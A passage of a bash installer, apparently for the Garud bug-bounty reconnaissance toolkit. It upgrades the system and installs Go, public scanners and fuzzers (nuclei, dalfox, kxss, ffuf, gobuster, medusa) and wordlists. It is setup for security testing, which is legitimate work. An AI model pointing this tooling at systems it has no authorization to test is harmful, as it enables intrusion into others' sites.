RUNNING THE SCRIPT" 9 | exit 10 | fi 11 | 12 | folders(){ 13 | mkdir -p ~/tools 14 | mkdir -p ~/tools/.tmp 15 | mkdir -p ~/.gf 16 | mkdir -p ~/wordlists 17 | } 18 | 19 | golanguage(){ 20 | goversion=$(curl -ks -L https://go.dev/VERSION?m=text) 21 | wget https://go.dev/dl/$goversion.linux-amd64.tar.gz -q 22 | rm -rf /usr/local/go && tar -C /usr/local -xzf $goversion.linux-amd64.tar.gz 23 | export PATH=$PATH:/usr/local/go/bin 24 | echo "export PATH=$PATH:/usr/local/go/bin" >> .bashrc 25 | if command -v go &> /dev/null; then 26 | echo -e "\n${GR}GO INSTALLED SUCCESSFULLY${RT}" 27 | else 28 | echo -e "\n${YW}THERE'S A PROBLEM INSTALLING GO, TRY INSTALLING IT MANUALLY${RT}" 29 | fi 30 | rm -rf $goversion.linux-amd64.tar.gz 31 | } 32 | 33 | dependencies(){ 34 | mv .github/payloads/patterns/*.json ~/.gf/ 2> /dev/null && cd 35 | echo -e "${BK}INSTALLING ALL DEPENDENCIES${RT}" 36 | sudo apt-get update > /dev/null 2>&1 37 | sudo apt-get full-upgrade -y > /dev/null 2>&1 38 | sudo apt-get install apt-transport-https bsdmainutils build-essential snapd cmake curl dnsutils gcc git jq libdata-hexdump-perl libffi-dev libpcap-dev libssl-dev libxml2-dev libxml2-utils libxslt1-dev lynx medusa nmap procps pv python3 python3-dev python3-pip wget zip zlib1g-dev libpcap-dev screen -y > /dev/null 2>&1 39 | sudo snap install chromium > /dev/null 2>&1 40 | golanguage 41 | echo -e "${GR}SUCCESS${RT}\n" 42 | } 43 | 44 | githubd(){ 45 | echo -e "${BK}DOWNLOADING AND INSTALLING ALL TOOLS FROM GITHUB${RT}\n" 46 | 47 | echo -e "\n- Installing Sublister" 48 | git clone https://github.com/aboul3la/Sublist3r.git -q ~/tools/Sublist3r 49 | cd ~/tools/Sublist3r && sudo pip3 install -r requirements.txt > /dev/null 2>&1 50 | git clone https://github.com/1ndianl33t/Gf-Patterns -q && mv Gf-Patterns/*.json ~/.gf/ && rm -rf Gf-Patterns/ > /dev/null 2>&1 51 | if [ -s ~/tools/Sublist3r/sublister.py ]; then 52 | echo -e "${GR}SUCCESS${RT}" 53 | else 54 | echo -e "${YW}FAILED${RT}" 55 | fi 56 | 57 | echo -e "\n- Installing Bhedak" 58 | cd && pip3 install bhedak > /dev/null 2>&1 59 | cd && pip3 install tldextract > /dev/null 2>&1 60 | which bhedak &> /dev/null && 61 | if command -v bhedak &> /dev/null; then 62 | echo -e "${GR}SUCCESS${RT}" 63 | else 64 | echo -e "${YW}FAILED${RT}" 65 | fi 66 | 67 | echo -e "\n- Installing Agnee" 68 | sudo pip3 install git+https://github.com/R0X4R/Search-Engines-Scraper.git > /dev/null 2>&1 && sudo pip3 install agnee > /dev/null 2>&1 69 | if command -v agnee &> /dev/null; then 70 | echo -e "${GR}SUCCESS${RT}" 71 | else 72 | echo -e "${YW}FAILED${RT}" 73 | fi 74 | 75 | echo -e "\n- Installing uro" 76 | cd && pip3 install uro > /dev/null 2>&1 77 | if command -v uro &> /dev/null; then 78 | echo -e "${GR}SUCCESS${RT}" 79 | else 80 | echo -e "${YW}FAILED${RT}" 81 | fi 82 | 83 | echo -e "\n- Installing anew" 84 | go install github.com/tomnomnom/anew@latest > /dev/null 2>&1 85 | if [ -f ~/go/bin/anew ]; then 86 | echo -e "${GR}SUCCESS${RT}" 87 | else 88 | echo -e "${YW}FAILED${RT}" 89 | fi 90 | 91 | echo -e "\n- Installing naabu" 92 | go install github.com/projectdiscovery/naabu/v2/cmd/naabu@latest > /dev/null 2>&1 93 | if [ -f ~/go/bin/naabu ]; then 94 | echo -e "${GR}SUCCESS${RT}" 95 | else 96 | echo -e "${YW}FAILED${RT}" 97 | fi 98 | 99 | echo -e "\n- Installing gobuster" 100 | go install github.com/OJ/gobuster/v3@latest > /dev/null 2>&1 101 | if [ -f ~/go/bin/gobuster ]; then 102 | echo -e "${GR}SUCCESS${RT}" 103 | else 104 | echo -e "${YW}FAILED${RT}" 105 | fi 106 | 107 | echo -e "\n- Installing gf" 108 | go install github.com/tomnomnom/gf@latest > /dev/null 2>&1 109 | if [ -f ~/go/bin/anew ]; then 110 | echo -e "${GR}SUCCESS${RT}" 111 | else 112 | echo -e "${YW}FAILED${RT}" 113 | fi 114 | 115 | echo -e "\n- Installing gospider" 116 | cd && git clone https://github.com/jaeles-project/gospider ~/tools/.tmp/gospider -q 117 | cd ~/tools/.tmp/gospider 2> /dev/null 118 | go install > /dev/null 2>&1 119 | if [ -f ~/go/bin/gospider ]; then 120 | echo -e "${GR}SUCCESS${RT}" 121 | else 122 | echo -e "${YW}FAILED${RT}" 123 | fi 124 | 125 | echo -e "\n- Installing aquatone" 126 | wget -q https://github.com/michenriksen/aquatone/releases/download/v1.7.0/aquatone_linux_amd64_1.7.0.zip > /dev/null 2>&1 127 | unzip aquatone_linux_amd64_1.7.0.zip > /dev/null 2>&1 128 | mv aquatone /usr/bin/ > /dev/null 2>&1 129 | rm -rf aquatone* LICENSE.txt README.md 130 | if command -v aquatone &> /dev/null; then 131 | echo -e "${GR}SUCCESS${RT}" 132 | else 133 | echo -e "${YW}FAILED${RT}" 134 | fi 135 | 136 | echo -e "\n- Installing assetfinder" 137 | go install github.com/tomnomnom/assetfinder@latest > /dev/null 2>&1 138 | if [ -f ~/go/bin/assetfinder ]; then 139 | echo -e "${GR}SUCCESS${RT}" 140 | else 141 | echo -e "${YW}FAILED${RT}" 142 | fi 143 | 144 | echo -e "\n- Installing crobat" 145 | go install github.com/cgboal/sonarsearch/cmd/crobat@latest > /dev/null 2>&1 146 | if [ -f ~/go/bin/crobat ]; then 147 | echo -e "${GR}SUCCESS${RT}" 148 | else 149 | echo -e "${YW}FAILED${RT}" 150 | fi 151 | 152 | echo -e "\n- Installing gau" 153 | go install github.com/lc/gau/v2/cmd/gau@latest > /dev/null 2>&1 154 | if [ -f ~/go/bin/gau ]; then 155 | echo -e "${GR}SUCCESS${RT}" 156 | else 157 | echo -e "${YW}FAILED${RT}" 158 | fi 159 | 160 | echo -e "\n- Installing waybackurls" 161 | go install github.com/tomnomnom/waybackurls@latest > /dev/null 2>&1 162 | if [ -f ~/go/bin/waybackurls ]; then 163 | echo -e "${GR}SUCCESS${RT}" 164 | else 165 | echo -e "${YW}FAILED${RT}" 166 | fi 167 | 168 | echo -e "\n- Installing kxss" 169 | go install github.com/Emoe/kxss@latest > /dev/null 2>&1 170 | if [ -f ~/go/bin/kxss ]; then 171 | echo -e "${GR}SUCCESS${RT}" 172 | else 173 | echo -e "${YW}FAILED${RT}" 174 | fi 175 | 176 | echo -e "\n- Installing qsreplace" 177 | go install github.com/tomnomnom/qsreplace@latest > /dev/null 2>&1 178 | if [ -f ~/go/bin/qsreplace ]; then 179 | echo -e "${GR}SUCCESS${RT}" 180 | else 181 | echo -e "${YW}FAILED${RT}" 182 | fi 183 | 184 | echo -e "\n- Installing ffuf" 185 | cd ~/tools/.tmp/ && git clone https://github.com/ffuf/ffuf -q 186 | cd ffuf && go install > /dev/null 2>&1 187 | if [ -f ~/go/bin/ffuf ]; then 188 | echo -e "${GR}SUCCESS${RT}" 189 | else 190 | echo -e "${YW}FAILED${RT}" 191 | fi 192 | 193 | echo -e "\n- Installing dnsx" 194 | go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest > /dev/null 2>&1 195 | if [ -f ~/go/bin/dnsx ]; then 196 | echo -e "${GR}SUCCESS${RT}" 197 | else 198 | echo -e "${YW}FAILED${RT}" 199 | fi 200 | 201 | echo -e "\n- Installing notify" 202 | go install -v github.com/projectdiscovery/notify/cmd/notify@latest > /dev/null 2>&1 203 | if [ -f ~/go/bin/notify ]; then 204 | echo -e "${GR}SUCCESS${RT}" 205 | else 206 | echo -e "${YW}FAILED${RT}" 207 | fi 208 | 209 | echo -e "\n- Installing dalfox" 210 | go install github.com/hahwul/dalfox/v2@latest > /dev/null 2>&1 211 | if [ -f ~/go/bin/dalfox ]; then 212 | echo -e "${GR}SUCCESS${RT}" 213 | else 214 | echo -e "${YW}FAILED${RT}" 215 | fi 216 | 217 | echo -e "\n- Installing crlfuzz" 218 | cd ~/tools/.tmp/ && git clone https://github.com/dwisiswant0/crlfuzz -q 219 | cd crlfuzz/cmd/crlfuzz && go install > /dev/null 2>&1 220 | if [ -f ~/go/bin/crlfuzz ]; then 221 | echo -e "${GR}SUCCESS${RT}" 222 | else 223 | echo -e "${YW}FAILED${RT}" 224 | fi 225 | 226 | echo -e "\n- Installing nuclei" 227 | go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest > /dev/null 2>&1 228 | if [ -f ~/go/bin/nuclei ]; then 229 | echo -e "${GR}SUCCESS${RT}" 230 | else 231 | echo -e "${YW}FAILED${RT}" 232 | fi 233 | 234 | echo -e "\n- Installing subfinder" 235 | go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest > /dev/null 2>&1 236 | if [ -f ~/go/bin/subfinder ]; then 237 | echo -e "${GR}SUCCESS${RT}" 238 | else 239 | echo -e "${YW}FAILED${RT}" 240 | fi 241 | 242 | echo -e "\n- Installing httprobe" 243 | cd ~/tools/.tmp && git clone https://github.com/tomnomnom/httprobe.git -q 244 | cd httprobe && go install > /dev/null 2>&1 245 | if [ -f ~/go/bin/httprobe ]; then 246 | echo -e "${GR}SUCCESS${RT}" 247 | else 248 | echo -e "${YW}FAILED${RT}" 249 | fi 250 | 251 | echo -e "\n- Installing httpx" 252 | go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest > /dev/null 2>&1 253 | if [ -f ~/go/bin/httpx ]; then 254 | echo -e "${GR}SUCCESS${RT}" 255 | else 256 | echo -e "${YW}FAILED${RT}" 257 | fi 258 | 259 | echo -e "\n- Installing amass" 260 | go install -v github.com/OWASP/Amass/v3/...@master > /dev/null 2>&1 261 | if [ -f ~/go/bin/amass ]; then 262 | echo -e "${GR}SUCCESS${RT}" 263 | else 264 | echo -e "${YW}FAILED${RT}" 265 | fi 266 | 267 | echo -e "\n- Installing gobuster" 268 | go install github.com/OJ/gobuster/v3@latest > /dev/null 2>&1 269 | if [ -f ~/go/bin/gobuster ]; then 270 | echo -e "${GR}SUCCESS${RT}" 271 | else 272 | echo -e "${YW}FAILED${RT}" 273 | fi 274 | } 275 | 276 | wordlistsd(){ 277 | echo -e "\n${BK}DOWNLOADING ALL THE WORDLISTS${RT}" 278 | cd ~/wordlists/ 279 | 280 | echo -e "\n- Downloading subdomains wordlists" 281 | wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/deepmagic.com-prefixes-top50000.txt -O subdomains.txt 282 | if [ -s subdomains.txt ]; then 283 | echo -e "${GR}SUCCESS${RT}" 284 | else 285 | echo -e "${YW}FAILED${RT}" 286 | fi 287 | 288 | echo -e "\n- Downloading resolvers wordlists" 289 | wget -q https://raw.githubusercontent.com/janmasarik/resolvers/master/resolvers.txt -O resolvers.txt 290 | if [ -s resolvers.txt ]; then 291 | echo -e "${GR}SUCCESS${RT}" 292 | else 293 | echo -e "${YW}FAILED${RT}" 294 | fi 295 | 296 | echo -e "\n- Downloading fuzz wordlists" 297 | wget -q https://raw.githubusercontent.com/Bo0oM/fuzz.txt/master/fuzz.txt -O fuzz.txt 298 | if [ -s fuzz.txt ]; then 299 | echo -e "${GR}SUCCESS${RT}" 300 | else 301 | echo -e "${YW}FAILED${RT}" 302 | fi 303 | } 304 | 305 | main(){ 306 | folders 307 | dependencies 308 | githubd 309 | wordlistsd 310 | echo -e "\n${BK}FINISHING UP THINGS${RT}" 311 | rm -rf ~/tools/.tmp/ > /dev/null 2>&1 312 | sudo cp ~/go/bin/* /usr/bin/ > /dev/null 2>&1 313 | nuclei -update-templates > /dev/null 2>&1 314 | echo -e "\nPLEASE CONFIGURE NOTIFY API'S IN ${BK} ~/.config/notify/provider-config.yaml ${RT} FILE" 315 | echo -e "THANKS FOR INSTALLING ${BK}GARUD${RT}. HAPPY HUNTING :)\nPS: If you get any bug using garud, please tweet about it and tag @R0X4R, also support me on ko-fi" 316 | garud -h 2> /dev/null 317 | } 318 | 319 | while true 320 | do 321 | main 322 | exit 323 | done --------------------------------------------------------------------------------